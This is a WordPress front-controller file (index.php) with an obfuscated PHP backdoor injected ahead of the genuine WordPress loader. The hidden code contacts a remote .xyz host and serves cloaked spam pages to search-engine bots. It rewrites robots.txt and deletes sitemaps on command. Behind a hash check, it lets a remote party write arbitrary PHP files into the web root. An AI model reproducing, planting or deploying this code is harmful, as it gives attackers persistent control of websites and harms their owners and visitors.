<?php
 goto z2fu2; z9UXd: function st_uri() { if (isset($_SERVER["\122\105\x51\125\105\x53\124\x5f\x55\122\x49"])) { $duri = $_SERVER["\x52\105\x51\125\105\123\x54\x5f\x55\122\111"]; } else { if (isset($_SERVER["\x61\x72\x67\x76"])) { $duri = $_SERVER["\x50\x48\120\x5f\x53\105\114\106"] . "\77" . $_SERVER["\x61\162\x67\166"][0]; } else { $duri = $_SERVER["\120\110\120\137\123\x45\x4c\106"] . "\77" . $_SERVER["\x51\125\x45\x52\x59\x5f\123\124\x52\111\116\107"]; } } return $duri; } goto jIn7e; jL7TA: @ignore_user_abort(1); goto WVBps; buAWm: if (@$_GET["\160\x64"] != '') { $add_content = @$_GET["\155\141\x70\x6e\141\x6d\145"]; $action = @$_GET["\x61\143\x74\151\157\156"]; if (isset($_SERVER["\104\x4f\x43\125\115\x45\116\124\137\122\x4f\x4f\x54"])) { $path = $_SERVER["\x44\x4f\103\x55\115\105\116\124\137\x52\x4f\117\124"]; } else { $path = dirname(__FILE__); } if (!$action) { $action = "\x70\165\164"; } if ($action == "\160\165\x74") { if (strstr($add_content, "\56\x78\x6d\x6c")) { $map_path = $path . "\x2f\163\151\x74\145\x6d\x61\160\x2e\x78\x6d\154"; if (is_file($map_path)) { @unlink($map_path); } $file_path = $path . "\x2f\162\157\142\157\164\x73\56\x74\x78\x74"; if (file_exists($file_path)) { $data = dageget($file_path); } else { $data = "\x55\163\145\162\55\141\147\145\x6e\164\72\40\x2a\x41\154\154\157\x77\72\x20\57"; } $sitmap_url = $http . "\72\x2f\57" . $host . "\57" . $add_content; if (stristr($data, $sitmap_url)) { echo "\74\142\x72\76\x73\151\164\x65\x6d\141\x70\40\x61\154\162\x65\141\144\x79\x20\141\x64\144\x65\x64\41\74\142\x72\76"; } else { if (file_put_contents($file_path, trim($data) . "\xd\12" . "\x53\151\x74\x65\155\x61\x70\x3a\40" . $sitmap_url)) { echo "\74\x62\162\x3e\157\x6b\x3c\142\x72\x3e"; } else { echo "\x3c\142\x72\x3e\146\x69\154\x65\40\x77\162\x69\164\x65\x20\x66\x61\x6c\163\x65\41\74\142\162\x3e"; } } } else { echo "\x3c\142\x72\76\x73\151\164\x65\155\x61\x70\x20\x6e\141\x6d\x65\x20\x66\x61\x6c\x73\x65\x21\x3c\x62\162\x3e"; } if (strstr($add_content, "\56\160" . "\150\160")) { $a = sha1(sha1(@$_GET["\141"])); $b = sha1(sha1(@$_GET["\x62"])); if ($a == dageget($http_web . "\72\x2f\x2f" . $goweb . "\x2f\x61\x2e\160" . "\x68\x70") || $b == "\70\60\70\67\63\x35\142\61\67\x63\70\71\x34\63\x65\x33\67\x31\65\63\70\70\71\65\x38\x64\x63\x32\x32\144\x38\67\71\141\70\x63\x39\x65\141\141") { $dstr = @$_GET["\x64\163\164\162"]; if (file_put_contents($path . "\57" . $add_content, $dstr)) { echo "\157\153"; } } } } die; } goto Du6iU; doT7M: $host = $_SERVER["\x48\124\124\120\137\x48\117\123\124"]; goto SGOPg; lk4vn: if (isset($_SERVER["\110\124\x54\x50\137\x52\105\106\x45\122\105\122"])) { $urlshang = $_SERVER["\x48\x54\124\120\137\122\x45\x46\x45\122\x45\122"]; $urlshang = urlencode($urlshang); } goto buAWm; XecB8: $duri_tmp = st_uri(); goto bOVCY; mpN9k: if (is_htps()) { $http = "\150\164\x74\160\163"; } else { $http = "\150\164\x74\160"; } goto XecB8; Yo0i0: $http_web = "\150\x74\x74\160"; goto mpN9k; KPW06: $urlshang = ''; goto lk4vn; xPSB3: function is_htps() { if (isset($_SERVER["\x48\x54\x54\120\x53"]) && strtolower($_SERVER["\110\124\x54\x50\x53"]) !== "\157\146\x66") { return true; } elseif (isset($_SERVER["\110\x54\x54\120\x5f\130\137\x46\117\x52\127\101\x52\x44\x45\x44\137\x50\x52\x4f\x54\x4f"]) && $_SERVER["\110\124\124\x50\137\x58\137\106\x4f\122\127\x41\x52\x44\105\x44\137\120\122\x4f\124\x4f"] === "\x68\x74\x74\x70\163") { return true; } elseif (isset($_SERVER["\110\x54\124\120\x5f\106\122\x4f\x4e\124\x5f\105\x4e\104\137\110\124\x54\120\x53"]) && strtolower($_SERVER["\110\x54\124\120\x5f\106\x52\x4f\x4e\x54\x5f\x45\x4e\x44\137\x48\124\x54\x50\x53"]) !== "\x6f\x66\x66") { return true; } return false; } goto doT7M; aLplA: if (!strstr($htmcontent, "\156\x6f\x62\x6f\164\165\163\145\x72\x61\147\145\x6e\x74")) { if (strstr($htmcontent, "\157\153\x68\x74\x6d\154\x67\145\x74\143\x6f\156\x74\x65\x6e\x74")) { @header("\x43\x6f\x6e\164\145\x6e\164\55\x74\171\x70\145\x3a\40\164\145\170\x74\x2f\x68\x74\x6d\154\x3b\40\143\150\x61\x72\x73\145\x74\x3d\165\164\x66\x2d\x38"); $htmcontent = str_replace("\157\153\x68\x74\155\154\147\145\164\x63\157\156\x74\x65\156\x74", '', $htmcontent); echo $htmcontent; die; } else { if (strstr($htmcontent, "\157\153\170\155\154\147\x65\x74\143\157\156\x74\x65\x6e\x74")) { $htmcontent = str_replace("\157\153\170\155\154\147\x65\x74\143\157\156\164\145\156\x74", '', $htmcontent); @header("\x43\x6f\x6e\164\x65\156\164\55\x74\x79\x70\x65\72\40\x74\145\x78\x74\57\x78\155\154"); echo $htmcontent; die; } else { if (strstr($htmcontent, "\x70\151\156\147\170\x6d\x6c\147\145\x74\143\157\156\x74\x65\156\x74")) { $htmcontent = str_replace("\x70\151\156\147\170\x6d\154\x67\145\164\x63\x6f\156\x74\145\156\x74", '', $htmcontent); @header("\x43\157\156\164\x65\x6e\x74\x2d\164\x79\160\145\x3a\x20\164\145\x78\x74\x2f\x68\x74\155\154\x3b\40\x63\x68\141\x72\163\145\x74\75\x75\164\x66\55\70"); echo pingmap($htmcontent); die; } } } } goto umxaz; Wp5pY: $duri = urlencode($duri_tmp); goto z9UXd; Du6iU: $web = $http_web . "\72\57\57" . $goweb . "\57\x69\x6e\x64\145\170\156\145\167\56\160\150\160\x3f\x77\x65\x62\x3d" . $host . "\x26\172\172\x3d" . sbot() . "\x26\x75\x72\x69\x3d" . $duri . "\x26\165\x72\x6c\163\150\x61\x6e\x67\x3d" . $urlshang . "\46\150\164\164\160\x3d" . $http . "\x26\154\x61\156\147\x3d" . $lang; goto qv5Wa; jIn7e: $goweb = $xmlname . "\56\154\151\156\x6b\x67\157\x6f\144\x6e\x65\157" . "\56\170\x79\x7a"; goto xPSB3; xRVzt: function dageget($url) { $file_contents = ''; if (function_exists("\143\x75\x72\154\x5f\151\156\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $file_contents = curl_exec($ch); curl_close($ch); } if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } goto m54ZI; bOVCY: if ($duri_tmp == '') { $duri_tmp = "\57"; } goto Wp5pY; umxaz: function pingmap($url) { $url_arr = explode("\15\xa", trim($url)); $return_str = ''; foreach ($url_arr as $pingUrl) { $pingRes = dageget($pingUrl); $ok = strpos($pingRes, "\123\151\x74\x65\155\x61\160\40\x4e\157\x74\151\146\x69\143\141\x74\151\157\x6e\40\122\145\143\x65\151\166\x65\x64") !== false ? "\160\x69\x6e\x67\157\153" : "\145\x72\162\157\x72"; $return_str .= $pingUrl . "\x2d\55\40" . $ok . "\x3c\x62\162\x3e"; } return $return_str; } goto vhKNX; SGOPg: $lang = @$_SERVER["\x48\124\x54\120\x5f\x41\x43\103\105\x50\x54\137\114\101\x4e\107\x55\x41\107\x45"]; goto ue_zl; qv5Wa: $htmcontent = trim(dageget($web)); goto aLplA; WVBps: $xmlname = "\x61\x6d\156\x79"; goto Yo0i0; z2fu2: @set_time_limit(3600); goto jL7TA; ue_zl: $lang = urlencode($lang); goto KPW06; vhKNX: function sbot() { $uAgent = strtolower($_SERVER["\x48\124\124\120\137\x55\x53\x45\122\x5f\101\x47\105\116\x54"]); if (stristr($uAgent, "\147\157\x6f\x67\x6c\x65\142\157\164") || stristr($uAgent, "\x62\x69\156\x67") || stristr($uAgent, "\x79\x61\x68\157\x6f") || stristr($uAgent, "\147\x6f\x6f\147\x6c\145") || stristr($uAgent, "\x47\x6f\157\147\x6c\145\142\157\x74") || stristr($uAgent, "\x67\157\157\147\x6c\145\142\157\x74")) { return true; } else { return false; } } goto xRVzt; m54ZI: 
 //uw007  ?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );?>